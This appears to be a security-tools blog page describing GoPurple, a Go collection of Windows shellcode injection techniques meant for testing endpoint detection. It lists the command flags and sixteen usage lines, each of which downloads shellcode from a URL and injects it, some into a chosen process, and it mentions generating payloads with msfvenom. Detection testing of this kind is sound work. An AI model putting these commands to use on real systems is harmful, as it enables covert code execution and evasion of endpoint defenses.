GoPurple is a simple collection of various shell code injection techniques, aiming to streamline the process of endpoint detection evaluation, beside challenging myself to get into Golang world.
go build
. Set GOOS=windows
if the build system is not Windows_ / | | |
| | _ _ _ _ _ _ _ _ | |
| | |_ |/ _ | ‘_ | | | | ‘| ‘_ | |/ _ \
| || | () | |) | || | | | |) | | /
_____|___/| ./ __,|| | ./||__|
| | | |
|| || by @s3cdev
-a string
Program command line arguments
-b string
block DLL mode (nonms/onlystore for QueueUserAPC )
-p int
Process ID to inject shellcode into
-prog string
program to inject into
-t string
shellcode injection technique to use:
1: CreateFiber
2: syscall
3: CreateThreadNative
4: CreateProcess
5: EtwpCreateEtwThread
6: CreateRemoteThread
7: RtlCreateUserThread
8: CreateThread
9: CreateRemoteThreadNative
10: CreateProcessWithPipe
11: QueueUserAPC
12: CreateThreadpoolWait
13: BananaPhone
14: EnumerateLoadedModules
15: EnumChildWindows
16: EnumPageFilesW
-u string
URL hosting the shellcode
Examples
A shellcode needs to be generated,this can be done using tools such as msfvenom or shad0w. Then the shellcode needs to be hosted to be remotely downloaded and executed on the remote machine. For the sake of clarity, the below demos illustrate different ways of using the tool.
How To Use
1 – gopurple.exe -u urlhostingpayload -t 1 (CreateFiber)
2 – gopurple.exe -u urlhostingpayload -t 2 (Syscall)
3 – gopurple.exe -u urlhostingpayload -t 3 (CreateThreadNative)
4 – gopurple.exe -u urlhostingpayload -t 4 (CreateProcess)
5 – gopurple.exe -u urlhostingpayload -t 5 (EtwpCreateEtwThread)
6 – gopurple.exe -u urlhostingpayload -t 6 -p targetprocess (CreateRemoteThread)
7 – gopurple.exe -u urlhostingpayload -t 7 -p targetprocess (RtlCreateUserThread)
8 – gopurple.exe -u urlhostingpayload -t 8 (CreateThread)
9 – gopurple.exe -u urlhostingpayload -t 9 -p targetprocess (CreateRemoteThreadNative)
10 – gopurple.exe -u urlhostingpayload -t 10 -prog porgram -a processargument (ex:C:\Windows\System32\WindowsPowerShell\v1.0) and processargument(ex:Get-Process) (CreateProcessWithPipe)
11 – gopurple.exe -u urlhostingpayload -t 11 -p targetpidasparentprocess -prog programtoinjectshellcodeinto -b methodtoblockdll(nonms or onlystore) (QueueUserAPC)
nonms = only DLLs that are signed by Microsoft can hook into the process
onlystore = only Microsoft store application’s process can hook into the process
12 – gopurple.exe -u urlhostingpayload -t 12 (CreateThreadpoolWait)
13 – gopurple.exe -u urlhostingpayload -t 13 (BananaPhone)
14- gopurple.exe -u urlhostingpayload -t 14 (EnumerateLoadedModules)
15- gopurple.exe -u urlhostingpayload -t 15 (EnumChildWindows)
16- gopurple.exe -u urlhostingpayload -t 16 (EnumPageFilesW)
Playwright-MCP (Model Context Protocol) is a cutting-edge tool designed to bridge the gap between AI…
JBDev is a specialized development tool designed to streamline the creation and debugging of jailbreak…
The Kereva LLM Code Scanner is an innovative static analysis tool tailored for Python applications…
Nuclei-Templates-Labs is a dynamic and comprehensive repository designed for security researchers, learners, and organizations to…
SSH-Stealer and RunAs-Stealer are malicious tools designed to stealthily harvest SSH credentials, enabling attackers to…
Control flow flattening is a common obfuscation technique used by OLLVM (Obfuscator-LLVM) to transform executable…